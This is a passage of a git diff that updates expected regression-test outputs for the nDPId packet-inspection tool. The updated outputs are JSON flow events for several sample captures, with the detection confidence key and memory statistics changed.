-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709993,"flow_last_seen":1602860710062,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":2212,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709979,"flow_last_seen":1602860710032,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":953,"flow_tot_l4_payload_len":3454,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709993,"flow_last_seen":1602860710062,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":2212,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709979,"flow_last_seen":1602860710032,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":953,"flow_tot_l4_payload_len":3454,"flow_avg_l4_payload_len":575,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":6194,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1602860710071} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 @@ -31,9 +31,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873087 bytes -~~ total memory freed........: 5873087 bytes -~~ total allocations/frees...: 118142/118142 +~~ total memory allocated....: 6006721 bytes +~~ total memory freed........: 6006721 bytes +~~ total allocations/frees...: 120904/120904 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1732 chars diff --git a/test/results/dhcp-fuzz.pcapng.out b/test/results/dhcp-fuzz.pcapng.out index 9f90cd78f..9ad1e0530 100644 --- a/test/results/dhcp-fuzz.pcapng.out +++ b/test/results/dhcp-fuzz.pcapng.out @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 857 chars diff --git a/test/results/diameter.pcap.out b/test/results/diameter.pcap.out index 7bac3f5a5..fab54cb16 100644 --- a/test/results/diameter.pcap.out +++ b/test/results/diameter.pcap.out @@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1263278878271} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"thread_ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7580000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"thread_ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="} 00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"thread_ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"thread_ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":1656,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1263278878357} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869617 bytes -~~ total memory freed........: 5869617 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6003251 bytes +~~ total memory freed........: 6003251 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 938 chars diff --git a/test/results/discord.pcap.out b/test/results/discord.pcap.out index 9b466de3f..e2e6b8cca 100644 --- a/test/results/discord.pcap.out +++ b/test/results/discord.pcap.out @@ -3,10 +3,10 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":42193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":42193,"pkt":"UlQAEjUCCAAnW\/mGCABFAAA8+ptAAEAGEIkKAAIPop+A6adSAbuGXfMIAAAAAKAC+vDjjQAAAgQFtAQCCAqmenD7AAAAAAEDAwc="} 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":42208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":42208,"pkt":"CAAnW\/mGUlQAEjUCCABFAAAsAYYAAEAGSa+in4DpCgACDwG7p1IAKQQBhl3zCWAS\/\/9B4AAAAgQFtA=="} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":42209,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":42209,"pkt":"UlQAEjUCCAAnW\/mGCABFAADY+p1AAEAGD+sKAAIPop+A6adSAbuGXfMJACkEAlAY+vBAZwAAFgMBAKsBAACnAwPx8xjD5ySSyjBvN4nq\/yhxDwDcyJh8lqatQ2ebeRUbCgAAGMArwCzMqcAvwDDMqMATwBQAnACdAC8ANQEAAGb\/AQABAAAAABAADgAAC2Rpc2NvcmQuY29tABcAAAAjAAAADQAUABIEAwgEBAEFAwgFBQEIBgYBAgEABQAFAQAAAAAAEAAOAAwCaDIIaHR0cC8xLjEACwACAQAACgAIAAYAHQAXABg="} -00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} -00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} +00820{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":42193,"flow_last_seen":42209,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":42209,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00879{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":42193,"flow_last_seen":42225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2886,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":42225,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"discord.com","server_names":"discord.com,sni.cloudflaressl.com,*.discord.com","ja3":"6f5e62edfa5933b1332ddf8b9fb3ef9d","ja3s":"9ebc57def2efb523f25c77af13aa6d48","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"31:3B:70:94:D5:DF:90:78:9C:A0:74:26:20:24:E4:3D:92:A7:57:9D"}} +00781{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":42193,"flow_last_seen":42247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":42247,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.159.128.233","src_port":42834,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Discord","breed":"Fun","category":"Collaborative"}} 00545{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"discord.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":3306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":42247} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874598 bytes -~~ total memory freed........: 5874598 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6008232 bytes +~~ total memory freed........: 6008232 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 448 chars ~~ json string max len.......: 1299 chars diff --git a/test/results/dlt_ppp.pcap.out b/test/results/dlt_ppp.pcap.out index ac66da9ea..25c283f89 100644 --- a/test/results/dlt_ppp.pcap.out +++ b/test/results/dlt_ppp.pcap.out @@ -10,9 +10,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory 